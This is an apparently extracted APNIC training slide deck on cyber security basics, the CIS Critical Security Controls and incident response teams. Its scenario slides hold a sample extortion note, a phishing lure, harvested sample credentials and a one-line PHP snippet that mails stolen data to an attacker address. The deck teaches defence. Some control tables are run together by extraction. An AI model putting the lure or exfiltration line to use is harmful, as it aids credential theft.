Issue Date:

Revision:

APNIC e-Learning: Introduction to Computer Security & Incident Response Teams (CSIRTs)

3 December 2014

1.0

Introduction

Introduction •  Current Role

–  Adli Wahid, Security Specialist @ APNIC –  Email: adli@apnic.net –  Blog: https://blog.apnic.net –  Interests: Computer Security & Incident Response,

Security Outreach, Honeynets –  Twitter: @adliwahid

•  Other Roles –  Board Member of the Forum of Incident Response and

Security Teams (FIRST.org) –  Member of Interpol Cyber Crime Expert Group –  Previously: Head of Malaysia CERT (MyCERT) &

member of Bank of Tokyo & Mitsubishi UFJ CERT (MUFG-CERT)

3

Security Initiatives @ APNIC

•  Target Audience –  Primarily Network Operators & Service Providers, APNIC members –  Collaboration with APCERT, INTERPOL and other organizations

Topics Domain

Resource Public Key Infrastructure (RPKI)

Routing

DNSSEC DNS

Source Address Validation Everywhere (SAVE)

DDoS Mitigation

Updating IRT References in APNIC Whois Database

Abuse Handling & Incident Response

http://www.apnic.net/security

Overview of Today’s Tutorial

3 Parts

1.  Quick Introduction to Cyber Security

2.  Technical Threat Landscape

3.  Critical Cyber Security Controls

4.  Introduction to CERTs/CSIRTS

•  Shorter version next week!

•  Credits for Additional Contents –  TERENA / GEANT – Technical Threat Landscape –  FIRST

5

Main Take-Aways

•  High level overview about cyber security & its challenges to organizations and nations

•  Different types of attacks and the threat landscape

•  Security Response capabilities and security response teams

6

7

Cyber Security In A Nutshell

Cyber Security In A Nutshell •  How do we think about security?

•  Addressing the CIA –  Confidentiality, Integrity, Availability

•  Part of Risk Management –  Risk = Threats x Vulnerabilities –  Dealing with the Known & and Unknown –  Understand priorities, strategy for dealing with risks

8

C

I

A

Cyber Security in a Nutshell (2)

•  Cyber Security Program –  Different Components –  Including Incident Response

•  People, Process, Technology

•  Security is a Process - Continuous Approach –  Including Learning from Incidents –  Applying Best Current Practices

•  Cyber Security Framework, Strategies?

•  Let’s look at a data breach incident!

9

Data Breach Incident

www.web.com

CEO’s Laptop

Command and Control Server

External Website

Email with Malicious Attachment

Confidential Information

10

Threat Landscape (Refer to Threat_Landscape_Terena.pdf)

11

Issue Date:

Revision:

Critical Security Controls for Effective Cyber Defense Module 2

Achieving Security is not Easy •  Inter-dependencies

–  Between Entities •  Enterprise, Vendors (Sotware & Hardware), Service Providers

–  Roles & Responsibilities •  Technical & Non-Technical

•  Scale –  Bigger & larger systems –  Beyond local boundaries

•  Functionality over Security –  It works! –  Market pressure, Users complaints

•  For Security to work a lot is required. People Process Technology!

•  But – Attackers Do Not Wait!

Goals of Information Security

Confidentiality Integrity Availability

SE

CU

RIT

Y

prevents unauthorized use or disclosure of information

safeguards the accuracy and completeness of information

authorized users have reliable and timely access to information

When or where do we secure data?

15

Data In Motion Data at Rest Data In Use

Quick Check!

•  How many of us –  Encrypt our Hard Disk / Phone –  Use 2 Factor Authentication (2FA)

•  Google, Facebook, LinkedIn •  Internet Banking

–  Use PGP/GnuPG or Email Encryption •  for sending confidential information •  For Verifying Source of Email

•  What are the risks or implication for not using those technology?

•  Important to apply defense and just learn about the concepts!

Security Best Current Practices

•  Adopt a framework, standard or guideline

•  Think about Security Strategically

•  Apply best current practices

•  Validate

•  Review & Improve (Continuous Improvement)

Quick Check 2: Cyber Security Hygiene •  5 steps

–  Count –  Configure –  Control –  Patch –  Repeat

•  How to apply this on day to day basis?

•  How many of us have this approach embedded in our internal procedures?

•  Where do we get the threat intelligence or security updates from?

So what is out there? •  Framework

–  NIST Cyber Security Framework

•  Strategy –  Japan Cyber Security Strategy

•  http://www.nisc.go.jp/eng/pdf/CyberSecurityStrategy.pdf –  UK Cyber Security Strategy

•  https://www.gov.uk/government/publications/cyber-security-strategy –  Collection of National Cyber Security Strategies

•  https://www.enisa.europa.eu/activities/Resilience-and-CIIP/national-cyber-security-strategies-ncsss/national-cyber-security-strategies-in-the-world

•  Standards –  ISMS (Information Security Management System) –  NIST 800-53 –  HIPAA –  PCI-DSS –  Critical Security Controls

Cyber Security Framework •  NIST Framework For Improving Critical Infrastructure

Cyber Security –  developed in 2014 –  https://www.cisecurity.org/images/frame.pdf

•  Provides a way to organize, conduct, and drive the conversation about security goals and improvements

•  However, it does not include any specific risk management process, or specify any priority of action

CIS CSC Introduction

•  Initially developed by SANS.org and now managed by Centre of Internet Security (CIS.org)

•  To secure against Cyber Attack, organizations must defend against internal & external threats

•  Two guiding principles: –  Prevention is ideal but detection is a must –  Offense informs defense

Goals of CSC

•  What –  Protect critical assets, infrastructure, and information

•  How –  strengthening your organization's defensive posture –  Focusing on continuous, automated protection and monitoring of your

infrastructure

•  Ultimately –  reduce compromises –  minimize the need for recovery efforts –  and lower associated costs

•  Making fundamental computer security defenses a well-understood, replicable, measurable, scalable, reliable, automatable, and continuous process

Methodology & Contributors

•  Reflect the combined knowledge of actual attack

•  Effective defenses of experts from the many organizations –  In US, UK, Australia

•  Critical Controls are the most effective and specific set of technical measures to –  Detect –  Prevent –  Mitigate

•  Living document (work in progress) to reflect changing threats and effective defense

CSC Philosophy •  Offense informs defense: Use knowledge of actual attacks that have

compromised systems to provide the foundation to build effective, practical defenses. Include only those controls that can be shown to stop known real-world attacks

•  Prioritization: Invest first in controls that will provide the greatest risk reduction and protection against the most dangerous threat actors, and that can be feasibly implemented in your computing environment.

•  Metrics: Establish common metrics to provide a shared language for executives, IT specialists, auditors, and security officials to measure the effectiveness of security measures within an organization so that required adjustments can be identified and implemented quickly.

•  Continuous monitoring: Carry out continuous monitoring to test and validate the effectiveness of current security measures.

•  Automation: Automate defenses so that organizations can achieve reliable, scalable, and continuous measurements of their adherence to the controls and related metrics.

How to Implement?

•  Step 1. Perform Initial Gap Assessment - determining what has been implemented and where gaps remain for each control and sub-control.

•  Step 2. Develop an Implementation Roadmap - selecting the specific controls (and sub-controls) to be implemented in each phase, and scheduling the phases based on business risk considerations.

•  Step 3. Implement the First Phase of Controls - identifying existing tools that can be repurposed or more fully utilized, new tools to acquire, processes to be enhanced, and skills to be developed through training.

•  Step 4. Integrate Controls into Operations - focusing on continuous monitoring and mitigation and weaving new processes into standard acquisition and systems management operations.

•  Step 5. Report and Manage Progress against the Implementation Roadmap developed in Step 2. Then repeat Steps 3-5 in the next phase of the Roadmap.

Practicality –  Quick wins that provide solid risk reduction without major procedural,

architectural, or technical changes to an environment, or that provide such substantial and immediate risk reduction against very common attacks that most security-aware organizations prioritize these key controls.3

–  Visibility and attribution measures to improve the process, architecture, and technical capabilities of organizations to monitor their networks and computer systems to detect attack attempts, locate points of entry, identify already-compromised machines, interrupt infiltrated attackers' activities, and gain information about the sources of an attack.

–  Improved information security configuration and hygiene to reduce the number and magnitude of security vulnerabilities and improve the operations of networked computer systems, with a focus on protecting against poor security practices by system administrators and end-users that could give an attacker an advantage

–  Advanced sub-controls that use new technologies that provide maximum

security but are harder to deploy or more expensive than commoditized security solutions

Mapping to other Standards

•  Full URL –  https://www.sans.org/media/critical-security-controls/critical-controls-

poster-2016.pdf

CSC Version 6.0

CSC 1: Inventory of Authorized and Unauthorized Devices CSC 2: Inventory of Authorized and Unauthorized Software CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers CSC 4: Continuous Vulnerability Assessment and Remediation CSC 5: Controlled Use of Administrative Privileges CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs CSC 7: Email and Web Browser Protections CSC 8: Malware Defenses CSC 9: Limitation and Control of Network Ports, Protocols, and Services CSC 10: Data Recovery Capability

CSC Version 6.0 (2)

CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches CSC 12: Boundary Defense CSC 13: Data Protection CSC 14: Controlled Access Based on the Need to Know CSC 15: Wireless Access Control CSC 16: Account Monitoring and Control CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps CSC 18: Application Software Security CSC 19: Incident Response and Management CSC 20: Penetration Tests and Red Team Exercises

How To Get Started?

•  CSC contains list of prioritized, vetted and supported security actions by organizations

•  Use them to assess & improve current security state

•  What should I be doing -> What we should ALL be doing

•  But you must understand what is critical to your: –  Business –  Data –  Networks –  Systems –  Infrastructures –  Impact of adversaries

Priorities

•  Foundational Cyber Security Hygiene: CSC1 – CSC 5 * –  Closely related to US National Cyber Hygiene Campaign –  ASD implementation: http://www.asd.gov.au/infosec/top-mitigations/

top-4-strategies-explained.htm

•  For each CSC –  Why this control is critical –  Actions or Sub-Controls to implement, automate & measure

effectiveness of controls –  Procedures or Tools to enable implementation –  Entity Relationship Diagram to show components of implementation

Action Plans 1.  Conduct a gap assessment to compare the organization's

current security stance to the detailed recommendations of the Critical Controls

2.  Implement the "First Five" and other "quick win" Critical Controls to address the gaps identified by the assessment over the next one or two quarters

3.  Assign security personnel to analyze and understand how Critical Controls beyond the quick wins can be deployed in the organization's environment

4.  Devise detailed plans to implement the "visibility and attribution" and "hardened configuration and improved information security hygiene" Critical Controls over the next year

5.  Plan for deployment of the "advanced controls" over the longer term.

Multiple Views

•  Do we know what is connected to our systems and networks? (CSC 1)

•  Do we know what software is running (or trying to run) on our systems and networks? (CSC 2)

•  Are we continuously managing our systems using “known good” configurations? (CSC 3)

•  Are we continuously looking for and managing “known bad” software? (CSC 4)

•  Do we limit and track the people who have the administrative privileges to change, bypass, or over-ride our security settings? (CSC 5)

CSC & Governance

•  Cybersecurity governance is a key responsibility of the board of directors and senior executives

•  IT must be an integral part of overall enterprise governance

•  Executives must have a clear understanding of what to expect from their information security program

•  CSC helps executives bridge understanding business perspectives of risk management to technical views of action & operational controls to manage the risks

Governance & CSC Sample

•  Governance item #1: Identify your most important information assets and the impact on your business or mission if they were to be compromised. (CSC1 & CSC2)

•  Governance Item #2: Manage the known cyber vulnerabilities of your information and make sure the necessary security policies are in place to manage the risk (CSC 3 & 4)

•  Governance Item #3: Clearly identify the key threats to your information and assess the weaknesses in your defense (CSC 8 & CSC 20)

•  Governance Item #4: Confirm and control who has access to the most important information (CSC 5 & CSC 14)

CSC 1: Inventory of Authorized and Unauthorized Devices •  Why Critical?

–  Attackers continuously scan address space of target organisations –  Attackers look for new & unprotected systems –  Attackers look for devices that go in & out of enterprise networks –  Attackers take advantage of new hardware / system not configured

properly –  Additional systems (demo, test, guest networks) –  Bring Your Own Device (Mobile) –  Managing all devices critical for planning & executing system back up

& recovery

CSC 1: Controls FamilyControlDescrip2on

System 1.1

Deployanautomatedassetinventorydiscoverytoolanduseittobuildapreliminaryinventoryofsystemsconnectedtoanorganiza7on’spublicandprivatenetwork(s).Bothac7vetoolsthatscanthroughIPv4orIPv6networkaddressrangesandpassivetoolsthatiden7fyhostsbasedonanalyzingtheirtrafficshouldbeemployed.

System 1.2 Iftheorganiza7onisdynamicallyassigningaddressesusingDHCP,thendeploydynamichostconfigura7onprotocol(DHCP)serverlogging,andusethisinforma7ontoimprovetheassetinventoryandhelpdetectunknownsystems.

System 1.3 Ensurethatallequipmentacquisi7onsautoma7callyupdatetheinventorysystemasnew,approveddevicesareconnectedtothenetwork.

CSC1: Controls (Cont)

System 1.4

Maintainanassetinventoryofallsystemsconnectedtothenetworkandthenetworkdevicesthemselves,recordingatleastthenetworkaddresses,machinename(s),purposeofeachsystem,anassetownerresponsibleforeachdevice,andthedepartmentassociatedwitheachdevice.TheinventoryshouldincludeeverysystemthathasanInternetprotocol(IP)addressonthenetwork,includingbutnotlimitedtodesktops,laptops,servers,networkequipment(routers,switches,firewalls,etc.),printers,storageareanetworks,VoiceOver-IPtelephones,mul7-homedaddresses,virtualaddresses,etc.Theassetinventorycreatedmustalsoincludedataonwhetherthedeviceisaportableand/orpersonaldevice.Devicessuchasmobilephones,tablets,laptops,andotherportableelectronicdevicesthatstoreorprocessdatamustbeiden7fied,regardlessofwhethertheyareaQachedtotheorganiza7on’snetwork.

System 1.5Deploynetworklevelauthen7ca7onvia802.1xtolimitandcontrolwhichdevicescanbeconnectedtothenetwork.The802.1xmustbe7edintotheinventorydatatodetermineauthorizedversusunauthorizedsystems.

System 1.6 Useclientcer7ficatestovalidateandauthen7catesystemspriortoconnec7ngtotheprivatenetwork.

CSC1: Procedures & Tools

•  Technical & Procedural actions

•  Manage inventory of hardware and all associated information throughout its lifecycle.

•  Use enterprise level tools that collect information actively or passively

•  Challenge in how to maintain current & accurate view of IT assets

•  Example of tools or software solutions?

CSC 1: Metrics

What is a CSIRT/CERT? (Refer to FIRST_CERT_Intro.pdf)

44

45

Scenarios

Think About

•  How would you handle this incident in your organisation?

•  How do you prioritize the tasks required to handle the incidents?

•  What kinds of tools or skills are required to analyze

•  If you need assistance, who would you contact?

•  If contacted by the media what do you tell them?

•  What are the post-incident activities you would do?

46

DDoS Threat

47

Date: Day, Month 2011 Subject: Partnership From: Attacker To: You Your site does not work because We attack your site. When your company will pay to us we will stop attack. Contact the director. Do not lose clients.

Dear User, We have introduced a new security feature on our website. Please reactivate your account here: http://www.bla.com.myp.s This is NOT a Phish Email

Login

Password

mark:1234567 joey:cherry2148 boss:abcdefgh123 finance:wky8767 admin:testtest123

<? $mailto=‘criminal@gmail.com’; mail($mailto,$subject,$message); ?>

Identity Theft / Phishing Example

48

1 2

43

49

Conclusion

Take-Aways

•  Don’t Wait For a Security Incident! –  How are you addressing Cyber Security in your organisation?

•  Review Incident Response & Handling Capabilities –  Think of Some Scenarios –  Policies & Procedures –  Point of Contact (PGP Key) –  Collaboration / Co-operation with others

•  Training & Learning More –  CSIRT Conferences & Events –  Best Practices Documents and Guidelines

50

References •  Recommended

–  RFC 2350 Expectations for Computer Security Incident Response •  https://www.rfc-editor.org/rfc/rfc2350.txt

–  APCERT (Asia Pacific Computer Emergency Response Team) •  http://www.apcert.org

–  Forum of Incident and Security Response Teams •  http://www.first.org

–  European Union Agency for Network & Information Security •  http://www.enisa.europa.eu/activities/cert

–  NIST.Gov •  SP 800-61 (Revision 2) Incident Handling Guide •  http://csrc.nist.gov/publications/nistpubs/800-61rev2/SP800-61rev2.pdf

–  Best Practice Forum @ IGF 2014 •  Establishing and Supporting Computer Emergency Response Teams (CERTs) for

Internet Security http://bit.ly/11MwuCI

51

Final Notes

•  Certificates –

Those participants not at the AUAF venue to send email to training@apnic.net to confirm attendance, an electronic certificate will be emailed to them.

•  Survey - https://www.surveymonkey.com/r/TSEC02-02JUN2016

52

More Information

•  Email adli@apnic.net

•  Twitter: @adliwahid

•  LInkedIn: Adli Wahid

53

Issue Date:

Revision:

Thank You! End of Session